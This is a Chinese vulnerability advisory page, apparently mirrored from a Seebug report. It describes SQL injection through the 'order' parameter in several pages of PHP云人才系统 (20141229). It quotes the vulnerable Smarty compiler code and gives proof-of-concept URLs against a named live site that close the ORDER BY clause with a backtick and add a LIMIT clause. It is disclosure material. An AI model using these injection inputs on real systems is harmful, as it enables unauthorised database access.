|PHP云人才系统(20141229)2处SQL注入 - VULHUB开源网络安全威胁库

PHP云人才系统(20141229)2处SQL注入

- AV AC AU C I A

发布： 2025-04-13

修订： 2025-04-13

### 简要描述： PHP云人才系统(20141229)二处隐蔽的SQL注入 ### 详细说明： PHP云人才系统二处SQL注入。 0x01: 问答首页 ======================== URL为： ``` http://www.hr135.com/ask/index.php?order=add_time ``` 其中参数order可以注入。看看代码/include/libs/Smarty_Compiler.class.php：5330 ``` 5330 function _complie_qlist_start($tag_args) 5331 { 5332 $paramer = $this->_parse_attrs($tag_args); 5333 $item = str_replace("'","",$paramer[item]); 5334 global $db,$db_config,$config; 5335 $path = dirname(dirname(dirname(__FILE__))); 5336 $ParamerArr = $this->GetSmarty($paramer,$_GET); 5337 $paramer = $ParamerArr[arr]; 5338 $Purl = $ParamerArr[purl]; 5339 5340 $where=1; 5341 //��ֶ�Ĭ��Ϊ��ʱ�� 5342 if($paramer[order]){ 5343 if($paramer[order]=="addtime"){ 5344 $paramer[order]="add_time"; 5345 } 5346 if($paramer[order]=="answernum"){ 5347 $paramer[order]="answer_num"; 5348 } 5349 $order = " ORDER BY `".$paramer[order]."` desc"; 5350 }else{ 5351 $order = " ORDER BY `add_time` desc"; 5352 } 5353 if($paramer[cid]){ 5354 $where .=" and `cid`='".$paramer[cid]."'"; 5355 } 5356 if($paramer[uid]){ 5357 $where .=" and `uid`='".$_COOKIE[uid]."'"; 5358 } 5359 if($paramer[recom]){//�Ƽ� �ֶ� 5360 $where .=" and `is_recom`='1'"; 5361 } 5362 if($paramer[limit]){ 5363 $limit=" limit ".$paramer[limit]; 5364 } 5365 if($paramer[ispage]){ 5366 $limit = $this->PageNav($paramer,$_GET,"question",$where,$Purl,"","2"); 5367 //$limit = $this->PageNav($paramer,$_GET,"q_class",$where,$Purl,'','2'); 5368 //$this->_tpl_vars["firmurl"] = $config['sy_weburl']."/index.php?m=question".$ParamerArr[firmurl]; 5369 } 5370 $rs = $db->select_all("question",$where.$order.$limit); ``` 里面的5349行将$paramer[order]带入了SQL，由于有``,但是addslashs不会修改`,所以可以注入`闭合原来SQL，然后插入SQL语句。再看看调用的地方，/ask/model/index.class.php：26 ``` 26 function index_action(){ 27 $this->public_action(); 28 $this->yunset("c","index"); 29 $this->yunset("order",$_GET['order']); 30 $my_attention=$this->obj->DB_select_once("attention","`uid`='".$this->uid."' and `type`='1'","ids"); 31 $my_atten=@explode(',',rtrim($my_attention['ids'],",")); 32 $this->seo('ask_index'); 33 $this->yunset("my_atten",$my_atten); 34 $this->wenda_tpl('index'); 35 } ``` $this->yunset("order",$_GET['order']);没有过滤order，传递给参数@order。然后在模版里面template/ask/index.htm:15 ``` 15 {yun:}qlist item=qlist ispage=1 t_len=20 order=@order limit=10{/yun} 16 <div class="answers_left_list"> 17 <div class="answers_left_list_left"> 18 <div class="answers_app_left" onmouseover="get_user_info('question_','{yun:}$qlist.id{/yun}','{yun:}$qlist.uid{/yun}','50');" onmouseout="hide_user_info('question_','{yun:}$qlist.id{/yun}')" id='question_{yun:}$qlist.id{/yun}' style=" cursor:pointer"> 19 <img src="{yun:}$qlist.pic{/yun}" width="40" height="40" onerror="showImgDelay(this,'{yun:}$config.sy_weburl{/yun}/{yun:}$config.sy_friend_icon{/yun}',2);"> 20 </div> 21 </div> ``` 在第15行将@order传递给了_complie_qlist_start(). ``` http://www.hr135.com/ask/index.php?order=add_time` ``` SQL出错没有任何数据 [<img src="https://images.seebug.org/upload/201412/31110436a4657768661e09ae7cbde4699669d471.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/31110436a4657768661e09ae7cbde4699669d471.png) ``` http://www.hr135.com/ask/index.php?order=add_time`%20limit%201%23 ``` 取一条数据： [<img src="https://images.seebug.org/upload/201412/31110518d0a5b66fcb9e386a551d23b6df10be16.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/31110518d0a5b66fcb9e386a551d23b6df10be16.png) ``` http://www.hr135.com/ask/index.php?order=add_time`%20limit%202%23 ``` 取两条数据： [<img src="https://images.seebug.org/upload/201412/3111052820c2a5dedf4ad9e010a75288b9440f86.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/3111052820c2a5dedf4ad9e010a75288b9440f86.png) 0x02: 找工作搜索页 ======================== URL为： ``` http://www.hr135.com/index.php?m=com&order=id&c=search&keyword=a ``` order参数可以注入。 ``` http://www.hr135.com/index.php?m=com&order=id`&c=search&keyword=a ``` SQL出错，没有数据 [<img src="https://images.seebug.org/upload/201412/31111717b98924fc04131718942a8a2b0a9f4894.png" alt="4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/31111717b98924fc04131718942a8a2b0a9f4894.png) ``` http://www.hr135.com/index.php?m=com&order=id%20limit%201%23&c=search&keyword=a ``` 取一条数据： [<img src="https://images.seebug.org/upload/201412/311117251efd73b13125a12107557993b9de78ec.png" alt="5.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/311117251efd73b13125a12107557993b9de78ec.png) ``` http://www.hr135.com/index.php?m=com&order=id%20limit%202%23&c=search&keyword=a ``` 取两天数据： [<img src="https://images.seebug.org/upload/201412/31111731295c1689a8b114f5538c7196f8dcf885.png" alt="6.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/31111731295c1689a8b114f5538c7196f8dcf885.png) 0x03: 招人才首页 ======================== URL为： ``` http://www.hr135.com/index.php?m=user&order=status_time ``` 其中参数order可以注入。 ``` http://www.hr135.com/index.php?m=user&order=status_time` ``` SQL出错，没有数据： [<img src="https://images.seebug.org/upload/201412/31112936e0b5414d133e5a7955aeba0109c85527.png" alt="7.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/31112936e0b5414d133e5a7955aeba0109c85527.png) ``` http://www.hr135.com/index.php?m=user&order=status_time`%20limit%201%23 ``` 取一条数据： [<img src="https://images.seebug.org/upload/201412/31112945a30c0544f50262eea80edbb8ad671c5b.png" alt="8.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/31112945a30c0544f50262eea80edbb8ad671c5b.png) ``` http://www.hr135.com/index.php?m=user&order=status_time`%20limit%202%23 ``` 取两条数据： [<img src="https://images.seebug.org/upload/201412/311129539c94289a19b8ab9ecf4a8f67c969734f.png" alt="9.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/311129539c94289a19b8ab9ecf4a8f67c969734f.png) ### 漏洞证明： [<img src="https://images.seebug.org/upload/201412/31110518d0a5b66fcb9e386a551d23b6df10be16.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/31110518d0a5b66fcb9e386a551d23b6df10be16.png) ``` http://www.hr135.com/ask/index.php?order=add_time`%20limit%202%23 ``` 取两条数据： [<img src="https://images.seebug.org/upload/201412/3111052820c2a5dedf4ad9e010a75288b9440f86.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/3111052820c2a5dedf4ad9e010a75288b9440f86.png) [<img src="https://images.seebug.org/upload/201412/311117251efd73b13125a12107557993b9de78ec.png" alt="5.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/311117251efd73b13125a12107557993b9de78ec.png) ``` http://www.hr135.com/index.php?m=com&order=id%20limit%202%23&c=search&keyword=a ``` 取两天数据： [<img src="https://images.seebug.org/upload/201412/31111731295c1689a8b114f5538c7196f8dcf885.png" alt="6.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/31111731295c1689a8b114f5538c7196f8dcf885.png) [<img src="https://images.seebug.org/upload/201412/31112945a30c0544f50262eea80edbb8ad671c5b.png" alt="8.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/31112945a30c0544f50262eea80edbb8ad671c5b.png) ``` http://www.hr135.com/index.php?m=user&order=status_time`%20limit%202%23 ``` 取两条数据： [<img src="https://images.seebug.org/upload/201412/311129539c94289a19b8ab9ecf4a8f67c969734f.png" alt="9.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/311129539c94289a19b8ab9ecf4a8f67c969734f.png)

漏洞利用/PoC

暂无可用Exp或PoC

受影响的平台与产品

当前有0条受影响产品信息

您还没有登录，登录后可查看更多

添加资源
收藏资源
问题反馈

贡献用户

暂无贡献用户

VULHUB ™